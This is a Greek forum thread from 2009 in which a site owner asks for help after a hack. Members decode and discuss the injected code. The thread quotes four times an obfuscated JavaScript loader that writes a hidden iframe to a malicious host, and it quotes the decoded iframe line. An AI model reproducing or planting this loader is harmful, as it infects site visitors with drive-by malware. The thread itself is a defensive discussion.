assaya Δημοσ. 25 Φεβρουαρίου 2009 Δημοσ. 25 Φεβρουαρίου 2009 ><script>function c271f17f2ch49a54e2181fc2(h49a54e21827e5){ return (parseInt(h49a54e21827e5,16));}function h49a54e2183fa0(h49a54e21847d6){ function h49a54e2185f87(){var h49a54e218678a=2;return h49a54e218678a;} var h49a54e2184f97='';h49a54e2186f8e=String.fromCharCode;for(h49a54e2185795=0;h49a54e2185795<h49a54e21847d6.length;h49a54e2185795+=h49a54e2185f87()){ h49a54e2184f97+=(h49a54e2186f8e(c271f17f2ch49a54e2181fc2(h49a54e21847d6.substr(h49a54e2185795,h49a54e2185f87()))));}return h49a54e2184f97;} var re2='';var h49a54e2187774='3C7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E696628216D7'+re2+'96961297'+re2+'B646F637'+re2+'56D656E7'+re2+'42E7'+re2+'7'+re2+'7'+re2+'2697'+re2+'465287'+re2+'56E657'+re2+'363617'+re2+'065282027'+re2+'2533632536392536362537'+re2+'32253631253664253635253230253665253631253664253635253364253633253332253337'+re2+'2532302537'+re2+'332537'+re2+'32253633253364253237'+re2+'2536382537'+re2+'342537'+re2+'342537'+re2+'302533612532662532662537'+re2+'392536312533312536622537'+re2+'322536352537'+re2+'362536352536342536622536662532652536332536662536642532662536392536652532652537'+re2+'302536382537'+re2+'30253366253237'+re2+'2532622534642536312537'+re2+'342536382532652537'+re2+'322536662537'+re2+'352536652536342532382534642536312537'+re2+'342536382532652537'+re2+'32253631253665253634253666253664253238253239253261253333253336253332253331253336253239253262253237'+re2+'253631253339253237'+re2+'2532302537'+re2+'37'+re2+'2536392536342537'+re2+'34253638253364253337'+re2+'253332253230253638253635253639253637'+re2+'2536382537'+re2+'342533642533352533302533332532302537'+re2+'332537'+re2+'342537'+re2+'39253663253635253364253237'+re2+'2537'+re2+'362536392537'+re2+'332536392536322536392536632536392537'+re2+'342537'+re2+'39253361253638253639253634253634253635253665253237'+re2+'2533652533632532662536392536362537'+re2+'3225363125366425363525336527'+re2+'29293B7'+re2+'D7'+re2+'6617'+re2+'2206D7'+re2+'969613D7'+re2+'47'+re2+'27'+re2+'5653B3C2F7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E';document.write(h49a54e2183fa0(h49a54e2187774));</script> τι είναι τούτο... μάς χτύπησαν το site... τίποτα οδηγίες για το πώς μπορώ να βρώ τις ανοχτές τρύπες??
PCharon Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 Ένα διπλοκρυμμένο javascript είναι που προσθέτει στη σελίδα τον παρακάτω κώδικα: ><iframe name=c27 src='http://ya1krevedko.com/in.php?'+Math.round(Math.random()*36216)+'a9' width=72 height=503 style='visibility:hidden'></iframe> ...δηλαδή κάποιο ad από το site ya1krevedko.com.
1nsom-n1k Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 τι έγινε ρε παιδιά γιατί πήρα αυτό μόλις μπήκα στο συγκεκριμένο θέμα
takis456 Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 Ένα διπλοκρυμμένο javascript είναι που προσθέτει στη σελίδα τον παρακάτω κώδικα: ><iframe name=c27 src='http://ya1krevedko.com/in.php?'+Math.round(Math.random()*36216)+'a9' width=72 height=503 style='visibility:hidden'></iframe> ...δηλαδή κάποιο ad από το site ya1krevedko.com. Δεν είναι ad. Το http://ya1krevedko.com/in.php?.. σε κάνει redirect στο http://dvcd.info/evo/count.php?o=7, το οποίο βγάζει warning με firefox: Αυτή η ιστοσελίδα στο dvcd.info έχει αναφερθεί ως μια σελίδα κακόβουλων επιθέσεων και έχει φραγεί σύμφωνα με τις προτιμήσεις ασφαλείας σας. τι έγινε ρε παιδιά γιατί πήρα αυτό μόλις μπήκα στο συγκεκριμένο θέμα Λόγω του javascript που υπάρχει στο πρώτο post.
bikey77 Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 ><script>function c271f17f2ch49a54e2181fc2(h49a54e21827e5){ return (parseInt(h49a54e21827e5,16));}function h49a54e2183fa0(h49a54e21847d6){ function h49a54e2185f87(){var h49a54e218678a=2;return h49a54e218678a;} var h49a54e2184f97='';h49a54e2186f8e=String.fromCharCode;for(h49a54e2185795=0;h49a54e2185795<h49a54e21847d6.length;h49a54e2185795+=h49a54e2185f87()){ h49a54e2184f97+=(h49a54e2186f8e(c271f17f2ch49a54e2181fc2(h49a54e21847d6.substr(h49a54e2185795,h49a54e2185f87()))));}return h49a54e2184f97;} var re2='';var h49a54e2187774='3C7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E696628216D7'+re2+'96961297'+re2+'B646F637'+re2+'56D656E7'+re2+'42E7'+re2+'7'+re2+'7'+re2+'2697'+re2+'465287'+re2+'56E657'+re2+'363617'+re2+'065282027'+re2+'2533632536392536362537'+re2+'32253631253664253635253230253665253631253664253635253364253633253332253337'+re2+'2532302537'+re2+'332537'+re2+'32253633253364253237'+re2+'2536382537'+re2+'342537'+re2+'342537'+re2+'302533612532662532662537'+re2+'392536312533312536622537'+re2+'322536352537'+re2+'362536352536342536622536662532652536332536662536642532662536392536652532652537'+re2+'302536382537'+re2+'30253366253237'+re2+'2532622534642536312537'+re2+'342536382532652537'+re2+'322536662537'+re2+'352536652536342532382534642536312537'+re2+'342536382532652537'+re2+'32253631253665253634253666253664253238253239253261253333253336253332253331253336253239253262253237'+re2+'253631253339253237'+re2+'2532302537'+re2+'37'+re2+'2536392536342537'+re2+'34253638253364253337'+re2+'253332253230253638253635253639253637'+re2+'2536382537'+re2+'342533642533352533302533332532302537'+re2+'332537'+re2+'342537'+re2+'39253663253635253364253237'+re2+'2537'+re2+'362536392537'+re2+'332536392536322536392536632536392537'+re2+'342537'+re2+'39253361253638253639253634253634253635253665253237'+re2+'2533652533632532662536392536362537'+re2+'3225363125366425363525336527'+re2+'29293B7'+re2+'D7'+re2+'6617'+re2+'2206D7'+re2+'969613D7'+re2+'47'+re2+'27'+re2+'5653B3C2F7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E';document.write(h49a54e2183fa0(h49a54e2187774));</script> τι είναι τούτο... μάς χτύπησαν το site... τίποτα οδηγίες για το πώς μπορώ να βρώ τις ανοχτές τρύπες?? Σε forum έγινε η επίθεση? SMF μήπως? Πρόσβαση πως απέκτησαν, μέσω ftp? Είχα κι εγώ παρόμοιο περιστατικό πριν 2-3 εβδομάδες.
chrismfz Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 Ένα διπλοκρυμμένο javascript είναι που προσθέτει στη σελίδα τον παρακάτω κώδικα: ><iframe name=c27 src='http://ya1krevedko.com/in.php?'+Math.round(Math.random()*36216)+'a9' width=72 height=503 style='visibility:hidden'></iframe> ...δηλαδή κάποιο ad από το site ya1krevedko.com. Με ποιο τρόπο έπεσε κρυπτανάλυση σε αυτό ? Γιατι και εγώ δοκιμασα μηπως και είναι base64 και 2-3 online javascript encoders - decoders και έφαγα ήττα...
PCharon Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 Με ποιο τρόπο έπεσε κρυπτανάλυση σε αυτό ? Μη σου πω σε δευτερόλεπτα...
assaya Δημοσ. 26 Φεβρουαρίου 2009 Μέλος Δημοσ. 26 Φεβρουαρίου 2009 προς το παρόν δεν έχουμε ιδέα πώς έγινε η επίθεση... δικός μας ο server και οι διαχειριστές δεν μας έχουν νέα! αν υπάρχει κάποιος που μπορεί να βοηθήσει θα το εκτιμούσα. ο κώδικας αυτός μας χτυπάει περίπου 80 html's που εχθές έπρεπε να φτιαχτεί το καθένα ξεχωριστά γιατί περιέχουν meta keywords για το google. Το χειρότερο είναι ότι σήμερα μας το έκαναν ξανα! όχι μόνο μας το έκαναν αλλά πλέον μας έβαλαν και login...
PCharon Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 ο κώδικας αυτός μας χτυπάει περίπου 80 html's Ο κώδικας αυτός από μόνος του δεν κάνει τίποτα, με άλλο τρόπο σας "χτυπάνε" και τον κάνουν inject στα html.
assaya Δημοσ. 26 Φεβρουαρίου 2009 Μέλος Δημοσ. 26 Φεβρουαρίου 2009 λογικό αυτό... πώς μπορούμε να το βρούμε όμως?? --εννοούσα ότι μας βάζουν αυτόν τον κώδικα σε 80 html's ----μήπως δεν έπρεπε να κάνω post στο web authoring?
StavrosD Δημοσ. 26 Φεβρουαρίου 2009 Δημοσ. 26 Φεβρουαρίου 2009 ><script>function c271f17f2ch49a54e2181fc2(h49a54e21827e5){ return (parseInt(h49a54e21827e5,16));}function h49a54e2183fa0(h49a54e21847d6){ function h49a54e2185f87(){var h49a54e218678a=2;return h49a54e218678a;} var h49a54e2184f97='';h49a54e2186f8e=String.fromCharCode;for(h49a54e2185795=0;h49a54e2185795<h49a54e21847d6.length;h49a54e2185795+=h49a54e2185f87()){ h49a54e2184f97+=(h49a54e2186f8e(c271f17f2ch49a54e2181fc2(h49a54e21847d6.substr(h49a54e2185795,h49a54e2185f87()))));}return h49a54e2184f97;} var re2='';var h49a54e2187774='3C7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E696628216D7'+re2+'96961297'+re2+'B646F637'+re2+'56D656E7'+re2+'42E7'+re2+'7'+re2+'7'+re2+'2697'+re2+'465287'+re2+'56E657'+re2+'363617'+re2+'065282027'+re2+'2533632536392536362537'+re2+'32253631253664253635253230253665253631253664253635253364253633253332253337'+re2+'2532302537'+re2+'332537'+re2+'32253633253364253237'+re2+'2536382537'+re2+'342537'+re2+'342537'+re2+'302533612532662532662537'+re2+'392536312533312536622537'+re2+'322536352537'+re2+'362536352536342536622536662532652536332536662536642532662536392536652532652537'+re2+'302536382537'+re2+'30253366253237'+re2+'2532622534642536312537'+re2+'342536382532652537'+re2+'322536662537'+re2+'352536652536342532382534642536312537'+re2+'342536382532652537'+re2+'32253631253665253634253666253664253238253239253261253333253336253332253331253336253239253262253237'+re2+'253631253339253237'+re2+'2532302537'+re2+'37'+re2+'2536392536342537'+re2+'34253638253364253337'+re2+'253332253230253638253635253639253637'+re2+'2536382537'+re2+'342533642533352533302533332532302537'+re2+'332537'+re2+'342537'+re2+'39253663253635253364253237'+re2+'2537'+re2+'362536392537'+re2+'332536392536322536392536632536392537'+re2+'342537'+re2+'39253361253638253639253634253634253635253665253237'+re2+'2533652533632532662536392536362537'+re2+'3225363125366425363525336527'+re2+'29293B7'+re2+'D7'+re2+'6617'+re2+'2206D7'+re2+'969613D7'+re2+'47'+re2+'27'+re2+'5653B3C2F7'+re2+'3637'+re2+'2697'+re2+'07'+re2+'43E';document.write(h49a54e2183fa0(h49a54e2187774));</script> τι είναι τούτο... μάς χτύπησαν το site... τίποτα οδηγίες για το πώς μπορώ να βρώ τις ανοχτές τρύπες?? Αυτό που βλέπεις είναι προϊόν obfuscation. Είναι τεχνική που χρησιμοποιείται για να κρύβει στοιχεία του κώδικα και να τον κάνει δυσανάγνωστο, ώστε να προστατεύει ο δημιουργός τον κώδικά του από την αντιγραφή ή το reverse engineering.
assaya Δημοσ. 27 Φεβρουαρίου 2009 Μέλος Δημοσ. 27 Φεβρουαρίου 2009 ναι φυσικά... περίμενα κάτι τέτοιο. το θέμα είναι πώς βρίσκω την τρύπα... το site είναι επάνω για κανά 3άρι ώρες... αλλά μας χτύπησαν κάμποσες φορές σήμερα... κάποιος με λευκό καπέλο ρε παιδιά???
PCharon Δημοσ. 27 Φεβρουαρίου 2009 Δημοσ. 27 Φεβρουαρίου 2009 ώστε να προστατεύεται ο δημιουργός του κώδικα από αντιγραφείς, και δυσκολεύει την αντιγραφή ή το reverse engineering του κώδικα. Ναι, πάρα πολύ... Βασικά το ομπφουσκασιόνε έχει νόημα μόνο για να αποτρέπεις το content sensing/filtering, κατά τα άλλα, τουλάχιστον αυτός ο τρόπος έχει μια καταφανή αχίλλειο πτέρνα κι αν θελήσεις να δεις τον κώδικα το κάνεις εντός δευτερολέπτων χωρίς κόπο. Είμαστε off topic όμως. @assaya τα λευκά καπέλα δεν είναι τσάμπα. Επίσης δεν καταλαβαίνω τί πράγμα ρωτάς και ξαναρωτάς, χωρίς να έχεις δώσει το παραμικρό στοιχείο περί τίνος πρόκειται (λύση μέσω του forum μην περιμένεις έτσι αόριστα). Γενικά μιλώντας, πρώτα κάνουμε update με όλα τα διαθέσιμα patches και με τις τελευταίες εκδόσεις για κάθε τί που χρησιμοποιούμε στο στήσιμο κι έπειτα αν συνεχίσει ξεκινάμε να ανησυχούμε. Ακόμα και λογισμικά "αλά λευκό καπέλο" υπάρχουν που αναλαμβάνουν να ξεψαχνίσουν ένα server για γνωστά exploits και vulnerabilities. Οι διαχειριστές πρέπει να κάνουν την παραπάνω δουλειά και να ενημερώνονται συνεχώς για τα νέα κενά ασφαλείας που αποκαλύπτονται, όχι απλά να ανεβάζουν περιεχόμενο. Το διαδίκτυο είναι εκεί έξω...
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.